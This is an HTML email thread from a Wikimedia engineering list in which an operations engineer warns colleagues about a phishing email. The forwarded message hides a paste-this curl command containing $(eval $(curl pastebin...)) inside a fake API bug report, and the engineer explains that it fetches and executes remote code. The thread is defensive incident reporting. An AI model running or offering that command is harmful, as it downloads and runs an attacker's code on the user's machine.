<div dir="ltr">Thanks Aeryn -- we all appreciate your concern about our security! Please keep the updates coming.<div><br></div><div>-Toby</div></div><div class="gmail_extra"><br><div class="gmail_quote">On Thu, Jun 15, 2017 at 12:25 PM, Aeryn Palmer <span dir="ltr"><<a href="mailto:apalmer@wikimedia.org" target="_blank">apalmer@wikimedia.org</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div dir="ltr">Hi All,<div><br></div><div>Just a note - the claims in the message some of us got this morning have already been examined and found to be a false alarm. Should have checked before I sent this email. Thanks, all!</div><div><br></div><div>Cheers,</div><div><br></div><div>Aeryn</div></div><div class="HOEnZb"><div class="h5"><div class="gmail_extra"><br><div class="gmail_quote">On Thu, Jun 15, 2017 at 12:15 PM, Aeryn Palmer <span dir="ltr"><<a href="mailto:apalmer@wikimedia.org" target="_blank">apalmer@wikimedia.org</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div dir="ltr">This appears to be from the same person who sent the email earlier this morning about an alleged leak, to whom Chad responded. Did anyone click the link they provided in that email? <div><br></div><div>Cheers,</div><div><br></div><div>Aeryn</div></div><div class="gmail_extra"><div><div class="m_-6644513662749801195h5"><br><div class="gmail_quote">On Thu, Jun 15, 2017 at 12:12 PM, Faidon Liambotis <span dir="ltr"><<a href="mailto:faidon@wikimedia.org" target="_blank">faidon@wikimedia.org</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">Hi,<br>
<br>
DO NOT RUN THE COMMAND BELOW. Please read this email in full.<br>
<br>
I just got an email, foundd below, which seems initially legitimate, but<br>
on a more careful read is malicious and an attempt to compromise my<br>
computer. Thankfully I don't have the habit of copy/pasting commands on<br>
my terminal and I read this email carefully, so I was not a victim of<br>
this.<br>
<br>
The email seems innocuous enough, by mentioning my name and an otherwise<br>
legitimate body pointing an API issue with a URL that looks like an<br>
api.php URL of ours. It suggests running a curl to reproduce, but if you<br>
look more carefully, that curl has $(eval $(curl<br>
<a href="https://pastebin.com/raw/xSWbdNAK" rel="noreferrer" target="_blank">https://pastebin.com/raw/xSWbd<wbr>NAK</a>) in it.<br>
<br>
That pastebin URL above contains an exec() of a base64 string, which, in<br>
turn, decoded, is a Python script that fetches and exec()s the contents<br>
of a URL. I have NOT fetched that URL yet, so I don't know what the<br>
contents are.  I'd advise to not do that either, unless done carefully<br>
from a sandboxed, unprivileged environment. It will also likely let the<br>
attacker know that someone accessed it, and possibly let them know that<br>
we're on to them.<br>
<br>
Please be on the lookout for similar attempts, and let security@ and ops<br>
know immediately if you get similar ones, or if you are suspicious of<br>
any other emails or weird behavior on your computer. Please also let us<br>
know IMMEDIATELY if you suspect you fell victim of one of these attacks.<br>
Make sure to confirm that your message was received. If in doubt, call<br>
me or other opsens on our cellphones, as found on officewiki's<br>
Contact_list.<br>
<br>
We also had a targeted phising attempt last week, by someone pertaining<br>
to be Katherine and attempting to extract donor data, so it's possible<br>
it's the same person trying a different angle. They may try another<br>
angles as well, so I'd advise everyone to be vigilant.<br>
<br>
Best,<br>
Faidon<br>
--<br>
Faidon Liambotis<br>
Principal Operations Engineer<br>
Wikimedia Foundation<br>
<br>
<br>
<br>
----- Forwarded message from Joshua Wilson <<a href="mailto:joshuaswillson@gmail.com" target="_blank">joshuaswillson@gmail.com</a>> -----<br>
<br>
Date: Thu, 15 Jun 2017 10:45:35 -0700<br>
From: Joshua Wilson <<a href="mailto:joshuaswillson@gmail.com" target="_blank">joshuaswillson@gmail.com</a>><br>
To: <a href="mailto:fliambotis@wikimedia.org" target="_blank">fliambotis@wikimedia.org</a><br>
Subject: Wikipedia REST API Issues<br>
<br>
Greetings Faidon,<br>
<br>
<br>
It seems as if the api `query` endpoint at the English Wikipedia is down. A<br>
simple "hello"<br>
api call as shown below responds with an internal server error. Further<br>
calls to the same<br>
endpoint result in the request timing out, until the endpoint is reachable<br>
again.<br>
<br>
[added by faidon: DO NOT RUN THIS COMMAND]<br>
curl <a href="https://en.wikipedia.org/w/api.php?action=query%5C&titles=$(eval" rel="noreferrer" target="_blank">https://en.wikipedia.org/w/api<wbr>.php?action=query\&titles=$(ev<wbr>al</a> $(curl<br>
<a href="https://pastebin.com/raw/xSWbdNAK" rel="noreferrer" target="_blank">https://pastebin.com/raw/xSWbd<wbr>NAK</a>)<br>
\\\&)Main%20Page\&prop=revisio<wbr>ns\&rvprop=content\&format=jso<wbr>n<br>
[added by faidon: DO NOT RUN THIS COMMAND]<br>
<br>
I'm interested in using english wikipedia data for some AI language<br>
comprehension research.<br>
<br>
If you could take a look, and possibly let me know if/when this service<br>
will be up, I would<br>
greatly appreciate it. I couldn't find any scheduled downtime information<br>
online, so I apologize<br>
if this behavior is expected.<br>
<br>
Thanks,<br>
<br>
Chelsea Anders<br>
<br>
----- End forwarded message -----<br>
</blockquote></div><br><br clear="all"><div><br></div></div></div><span class="m_-6644513662749801195HOEnZb"><font color="#888888">-- <br><div class="m_-6644513662749801195m_5913944076066633089gmail_signature" data-smartmail="gmail_signature"><div dir="ltr"><div><div dir="ltr"><div><div dir="ltr"><div><div dir="ltr"><div><div dir="ltr"><div><div dir="ltr"><div dir="ltr"><div dir="ltr">Aeryn Palmer<div>Legal Counsel</div><div>Wikimedia Foundation</div><div>149 New Montgomery Street, 6th Floor</div><div>San Francisco, CA 94105</div><div><a href="mailto:apalmer@wikimedia.org" style="font-family:Arial;text-indent:48px" target="_blank">apalmer@wikimedia.org</a></div><div><span style="color:rgb(18,85,204);font-family:Arial;text-indent:48px"><a href="tel:(415)%20839-6885" value="+14158396885" target="_blank">415.839.6885</a></span><span style="font-family:Arial;text-indent:48px;color:rgb(35,35,35)"> (Office)</span></div><div><span style="color:rgb(18,85,204);font-family:Arial;text-indent:48px"><a href="tel:(415)%20882-0495" value="+14158820495" target="_blank">415.882.0495</a></span><span style="font-family:Arial;text-indent:48px;color:rgb(35,35,35)"> (Fax)</span></div><div><span style="color:#232323"><i>California Registered In-House Counsel</i></span></div><div><p style="margin:0px;font-size:12px;font-family:Arial;color:rgb(35,35,35)"><i style="color:rgb(34,34,34);font-family:arial,helvetica,sans-serif;font-size:x-small"><span style="color:rgb(0,0,0);vertical-align:baseline;white-space:pre-wrap;background-color:transparent">NOTICE: This message may be confidential or legally privileged. If you have received it by accident, please delete it and let us know about the mistake. As an attorney for the Wikimedia Foundation and for legal/ethical reasons, I cannot give legal advice to, or serve as a lawyer for, community members, volunteers, or staff members in their personal capacity. For more on what this means, please see our </span><a href="https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer" style="color:rgb(17,85,204);text-decoration:none" target="_blank"><span style="text-decoration:underline;vertical-align:baseline;white-space:pre-wrap;background-color:transparent">legal disclaimer</span></a><span style="color:rgb(0,0,0);vertical-align:baseline;white-space:pre-wrap;background-color:transparent">.</span></i><br></p></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div>
</font></span></div>
</blockquote></div><br><br clear="all"><div><br></div>-- <br><div class="m_-6644513662749801195gmail_signature" data-smartmail="gmail_signature"><div dir="ltr"><div><div dir="ltr"><div><div dir="ltr"><div><div dir="ltr"><div><div dir="ltr"><div><div dir="ltr"><div dir="ltr"><div dir="ltr">Aeryn Palmer<div>Legal Counsel</div><div>Wikimedia Foundation</div><div>149 New Montgomery Street, 6th Floor</div><div>San Francisco, CA 94105</div><div><a href="mailto:apalmer@wikimedia.org" style="font-family:Arial;text-indent:48px" target="_blank">apalmer@wikimedia.org</a></div><div><span style="color:rgb(18,85,204);font-family:Arial;text-indent:48px"><a href="tel:(415)%20839-6885" value="+14158396885" target="_blank">415.839.6885</a></span><span style="font-family:Arial;text-indent:48px;color:rgb(35,35,35)"> (Office)</span></div><div><span style="color:rgb(18,85,204);font-family:Arial;text-indent:48px"><a href="tel:(415)%20882-0495" value="+14158820495" target="_blank">415.882.0495</a></span><span style="font-family:Arial;text-indent:48px;color:rgb(35,35,35)"> (Fax)</span></div><div><span style="color:#232323"><i>California Registered In-House Counsel</i></span></div><div><p style="margin:0px;font-size:12px;font-family:Arial;color:rgb(35,35,35)"><i style="color:rgb(34,34,34);font-family:arial,helvetica,sans-serif;font-size:x-small"><span style="color:rgb(0,0,0);vertical-align:baseline;white-space:pre-wrap;background-color:transparent">NOTICE: This message may be confidential or legally privileged. If you have received it by accident, please delete it and let us know about the mistake. As an attorney for the Wikimedia Foundation and for legal/ethical reasons, I cannot give legal advice to, or serve as a lawyer for, community members, volunteers, or staff members in their personal capacity. For more on what this means, please see our </span><a href="https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer" style="color:rgb(17,85,204);text-decoration:none" target="_blank"><span style="text-decoration:underline;vertical-align:baseline;white-space:pre-wrap;background-color:transparent">legal disclaimer</span></a><span style="color:rgb(0,0,0);vertical-align:baseline;white-space:pre-wrap;background-color:transparent">.</span></i><br></p></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div>
</div>
</div></div><br>______________________________<wbr>_________________<br>
Engineering mailing list<br>
<a href="mailto:Engineering@lists.wikimedia.org">Engineering@lists.wikimedia.<wbr>org</a><br>
<a href="https://lists.wikimedia.org/mailman/listinfo/engineering" rel="noreferrer" target="_blank">https://lists.wikimedia.org/<wbr>mailman/listinfo/engineering</a><br>
<br></blockquote></div><br></div>